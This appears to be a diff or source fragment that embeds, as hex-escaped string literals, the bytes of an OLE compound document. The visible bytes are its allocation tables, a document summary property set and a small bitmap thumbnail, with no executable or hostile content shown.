-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x81\x00\x00\x00\x82\x00\x00\x00\x83\x00\x00\x00\x84\x00\x00\x00" -"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00" -"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00" -"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00" -"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\x94\x00\x00\x00" -"\xfe\xff\xff\xff\x96\x00\x00\x00\x98\x00\x00\x00\xfe\xff\xff\xff" -"\xc8\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00" -"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00" -"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00" -"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00" -"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00" -"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00" -"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00" -"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00" -"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00" -"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00" -"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00" -"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xfe\xff\xff\xff" -"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xfe\xff\x00\x00\x02\x00\x00\x00\xe0\x85\x9f\xf2\xf9\x4f\x68\x10" -"\xab\x91\x08\x00\x2b\x27\xb3\xd9\x01\x00\x00\x00\xe0\x85\x9f\xf2" -"\xf9\x4f\x68\x10\xab\x91\x08\x00\x2b\x27\xb3\xd9\x30\x00\x00\x00" -"\x18\x5d\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x50\x00\x00\x00" -"\x0a\x00\x00\x00\x58\x00\x00\x00\x0b\x00\x00\x00\x64\x00\x00\x00" -"\x0c\x00\x00\x00\x70\x00\x00\x00\x0d\x00\x00\x00\x7c\x00\x00\x00" -"\x0e\x00\x00\x00\x88\x00\x00\x00\x0f\x00\x00\x00\x90\x00\x00\x00" -"\x10\x00\x00\x00\x98\x00\x00\x00\x11\x00\x00\x00\xa0\x00\x00\x00" -"\x02\x00\x00\x00\xe4\x04\x00\x00\x40\x00\x00\x00\xa0\x33\xac\x3b" -"\x79\x7f\xc7\x01\x40\x00\x00\x00\xa0\x33\xac\x3b\x79\x7f\xc7\x01" -"\x40\x00\x00\x00\xa0\x33\xac\x3b\x79\x7f\xc7\x01\x40\x00\x00\x00" -"\xa0\x33\xac\x3b\x79\x7f\xc7\x01\x03\x00\x00\x00\x00\x00\x00\x00" -"\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" -"\x47\x00\x00\x00\x70\x5c\x00\x00\xff\xff\xff\xff\x08\x00\x00\x00" -"\x28\x00\x00\x00\x60\x00\x00\x00\x52\x00\x00\x00\x01\x00\x18\x00" -"\x00\x00\x00\x00\x40\x5c\x00\x00\x6d\x0b\x00\x00\x6d\x0b\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xeb\xef\xea\xeb\xed\xe8\xea" -"\xec\xed\xee\xf0\xe8\xe9\xec\xeb\xec\xee\xf9\xf9\xfa\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xeb\xee\xf2\xf2\xf3\xf4\xec\xed" -"\xee\xe9\xea\xec\xea\xec\xed\xec\xed\xef\xf5\xf6\xf6\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xff\xff\xff" -"\xff\xff\xff\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" 
-"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xff\xff\xff" -"\xff\xff\xff\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb" -"\xfb\xfb\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xf6\xf4\xf2\xe5\xe3" -"\xe1\xdf\xde\xdc\xe0\xde\xdb\xdf\xde\xdd\xe0\xde\xdc\xe1\xdf\xdd" -"\xe1\xe0\xdf\xe1\xdf\xdd\xe2\xe0\xdd\xe2\xe0\xdd\xe2\xe1\xdf\xe2" -"\xe1\xdf\xe1\xdf\xdb\xe1\xe0\xdf\xe2\xe0\xde\xe1\xe0\xde\xe0\xdf" -"\xde\xe1\xe0\xde\xe2\xe0\xdf\xe1\xdf\xdc\xe2\xdf\xdc\xdc\xdc\xdd" -"\xdd\xda\xd6\xe2\xe0\xde\xe2\xe0\xdd\xe2\xe0\xde\xe2\xe0\xdf\xe0" -"\xdf\xdd\xe1\xe0\xdf\xe1\xe0\xdf\xe0\xdf\xdd\xe0\xdf\xde\xe1\xe0" -"\xdd\xe2\xe0\xdf\xe1\xe0\xde\xe1\xdf\xdc\xe1\xe0\xdf\xe1\xdf\xdd" -"\xe1\xe0\xde\xe2\xe0\xdd\xe2\xe0\xde\xe2\xe0\xdf\xe1\xdf\xdd\xe2" -"\xe1\xdf\xe2\xe0\xde\xdc\xd9\xd5\xdb\xda\xd9\xe1\xe0\xdd\xe2\xe0" -"\xde\xe2\xe0\xdc\xe1\xdf\xdd\xe2\xe0\xdf\xe1\xdf\xdd\xe0\xdf\xdd" -"\xe2\xe0\xdd\xe2\xe0\xdd\xe2\xe0\xdf\xe0\xde\xdc\xe1\xe0\xdf\xe2" -"\xe1\xdf\xe1\xe0\xdd\xe1\xe0\xde\xe0\xdf\xde\xe0\xdf\xde\xe1\xe0" -"\xde\xe1\xdf\xdd\xe1\xe0\xdf\xe1\xdf\xdd\xe1\xdf\xdc\xdc\xdc\xdd" -"\xdb\xdb\xda\xe1\xe0\xde\xe2\xdf\xdc\xe2\xe1\xdf\xe1\xe0\xdf\xe1" -"\xdf\xdd\xe1\xe0\xdf\xe2\xe0\xdd\xe2\xe0\xdd\xe1\xe0\xde\xe1\xdf" -"\xdd\xe1\xe1\xdf\xe2\xdf\xdc\xe1\xe0\xdd\xe1\xe0\xde\xe1\xdf\xdd" -"\xe0\xdf\xde\xe1\xdf\xdc\xe2\xe0\xde\xe2\xe0\xdf\xe1\xdf\xdd\xe2" -"\xe0\xde\xdf\xdf\xde\xff\xff\xff\xff\xff\xff\xec\xeb\xea\xe5\xe8" -"\xee\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0" -"\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe6\xe9\xf1\xe5\xe9\xf1\xe5" -"\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9" 
-"\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5" -"\xe8\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9" -"\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0" -"\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5" -"\xe9\xf0\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe9\xf0\xe5\xe8" -"\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe8\xf0" -"\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe9\xf1\xe5\xe9\xf1\xe5" -"\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9" -"\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5" -"\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe9" -"\xf0\xe5\xe9\xf0\xe6\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0" -"\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5" -"\xe8\xf0\xd9\xd8\xd7\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" 
-"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd6\xd2\xff\xff\xff\xff\xff\xff\xed\xec\xeb\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd8\xd7\xd6\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8" -"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe8\xe8\xe8" -"\xec\xeb\xeb\xec\xeb\xea\xec\xeb\xea\xed\xed\xee\xec\xea\xe9\xec" -"\xeb\xeb\xed\xec\xec\xed\xec\xec\xed\xec\xec\xec\xea\xe9\xed\xec" -"\xed\xed\xed\xee\xec\xeb\xea\xed\xec\xed\xec\xec\xec\xea\xe9\xe8" -"\xea\xe7\xe4\xec\xea\xe9\xed\xed\xed\xec\xea\xe9\xec\xeb\xea\xed" -"\xec\xec\xec\xeb\xeb\xec\xec\xec\xec\xeb\xea\xed\xec\xed\xed\xed" -"\xee\xec\xeb\xeb\xed\xed\xef\xed\xec\xec\xed\xeb\xeb\xed\xec\xeb" 
-"\xe6\xe9\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe8\xf0\xe8\xe8\xec\xeb" -"\xe9\xe8\xec\xeb\xeb\xeb\xea\xea\xea\xe7\xe5\xec\xec\xed\xec\xea" -"\xea\xed\xec\xed\xed\xec\xed\xec\xeb\xeb\xec\xec\xec\xec\xeb\xec" -"\xec\xec\xec\xec\xeb\xeb\xeb\xea\xe9\xed\xec\xed\xeb\xe9\xe8\xec" -"\xeb\xeb\xec\xec\xed\xec\xeb\xec\xec\xeb\xec\xec\xeb\xea\xed\xec" -"\xee\xed\xec\xee\xec\xea\xe9\xec\xec\xed\xed\xec\xec\xeb\xe9\xe8" -"\xe9\xe6\xe4\xeb\xea\xe9\xec\xec\xed\xeb\xe9\xe9\xec\xeb\xeb\xec" -"\xec\xec\xec\xea\xea\xec\xec\xec\xec\xeb\xeb\xed\xec\xed\xed\xec" -"\xee\xec\xeb\xea\xed\xec\xed\xec\xec\xed\xec\xeb\xec\xeb\xea\xea" -"\xec\xeb\xeb\xed\xec\xee\xeb\xea\xea\xe5\xe6\xeb\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xed\xeb\xea\xe5\xe8" -"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xee\xeb\xe8" -"\xfa\xf9\xf7\xfb\xfb\xf9\xfc\xfb\xf9\xfc\xfc\xfb\xfc\xfa\xf8\xfb" -"\xfb\xfa\xfc\xfb\xfa\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9\xfc\xfb" -"\xfa\xfb\xfb\xfa\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xfa\xfe\xfe\xfe" -"\xfe\xfe\xfe\xfb\xfa\xf8\xf7\xf6\xf6\xf7\xf6\xf5\xfb\xfa\xf9\xfb" -"\xfb\xfa\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfb\xfa\xfc\xfb\xfb\xfc\xfb" -"\xfb\xfc\xfb\xf9\xfc\xfc\xfb\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf8" -"\xe5\xe7\xeb\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xee\xec\xe9\xe6\xf9" -"\xf6\xf3\xfb\xfb\xf9\xff\xff\xff\xff\xff\xff\xfc\xfb\xfa\xfb\xfa" -"\xf8\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9\xfb\xfa\xf9\xfb\xfb\xf9" -"\xfb\xfb\xfa\xfb\xfa\xf9\xfb\xfa\xf8\xfc\xfb\xf9\xfb\xf9\xf7\xfb" -"\xfa\xf8\xfb\xfb\xfa\xfb\xfa\xf9\xfb\xfb\xf9\xfb\xfa\xf9\xfc\xfb" -"\xfa\xfc\xfb\xfa\xfb\xfa\xf8\xfc\xfb\xfa\xfb\xfa\xf9\xfe\xfe\xfe" -"\xfe\xfe\xfe\xfb\xfa\xf8\xfb\xfa\xf9\xfa\xf9\xf8\xfb\xfa\xf9\xfb" -"\xfa\xf9\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfb\xf9\xfc\xfb\xfa\xfc\xfb" -"\xfa\xfc\xfa\xf8\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfb\xfa\xfb\xfa\xf9" -"\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xf9\xe6\xe7\xea\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xed\xed\xed\xe5\xe8" 
-"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xee\xed" -"\xfd\xfd\xfc\xfb\xfb\xfb\xf2\xf2\xf2\xf9\xf9\xf9\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xf5\xf6\xf6\xe9\xea\xea\xec\xec" -"\xed\xdb\xdc\xdb\xdf\xe0\xe0\xea\xeb\xeb\xdb\xdb\xdb\xf1\xf1\xf1" -"\xfc\xfc\xfc\xd8\xd8\xd9\xcd\xce\xcf\xd0\xd1\xd2\xdb\xdc\xdc\xe0" -"\xe1\xe1\xe5\xe5\xe5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfb" -"\xfb\xf5\xf5\xf5\xf1\xf1\xf1\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd" -"\xe6\xe8\xed\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xee\xed\xed\xfc" -"\xfc\xfb\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xf6\xf6\xf6\xfe\xfe" -"\xfe\xff\xff\xff\xff\xff\xff\xfa\xfa\xfb\xe6\xe6\xe7\xe8\xe8\xe9" -"\xe5\xe5\xe6\xdc\xdc\xdd\xe5\xe6\xe6\xdf\xdf\xdf\xdc\xdc\xdc\xdb" -"\xdb\xdc\xe5\xe6\xe6\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe1\xe1\xe1\xea\xea\xea" -"\xd9\xda\xd9\xe4\xe5\xe5\xe4\xe4\xe4\xdb\xdb\xdb\xe3\xe3\xe3\xde" -"\xde\xde\xf6\xf6\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xf2\xf2\xf2\xf3\xf3\xf3\xfa\xfa\xfa" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe8\xeb\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xef\xf1\xf6\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf4\xf5\xf6" -"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf3\xea\xde\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf8\xf8\xd2\xd3\xd3\xac\xad" -"\xad\xd6\xd6\xd6\xe1\xe1\xe2\xd2\xd2\xd2\xd4\xd5\xd6\xed\xed\xed" -"\xfa\xfa\xfa\xd1\xd1\xd1\xb4\xb5\xb4\xd3\xd3\xd3\xd7\xd7\xd7\xdf" -"\xe0\xe0\xdd\xde\xdd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xf2\xf6\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xcf\xcf\xcf\xde\xde\xde" -"\xb3\xb3\xb2\xd5\xd6\xd5\xcf\xcf\xcf\xd1\xd1\xd1\xcf\xcf\xcf\xee" 
-"\xef\xee\xd6\xd6\xd6\xf5\xf6\xf6\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xdc\xdc\xdc\xe7\xe7\xe7" -"\xe5\xe5\xe6\x98\x9a\x9b\xdc\xdc\xdc\xee\xef\xee\xdf\xdf\xdf\xd5" -"\xd5\xd6\xf9\xf9\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe4\xe7\xeb\xe6\xe9\xf1\xe6" -"\xe9\xf1\xd6\xcd\xc1\xff\xff\xff\xff\xff\xff\xe5\xdc\xd1\xe6\xe9" -"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xec\xe4\xdc" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xf8\xf4\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfc" -"\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xe5\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xdd\xd0\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 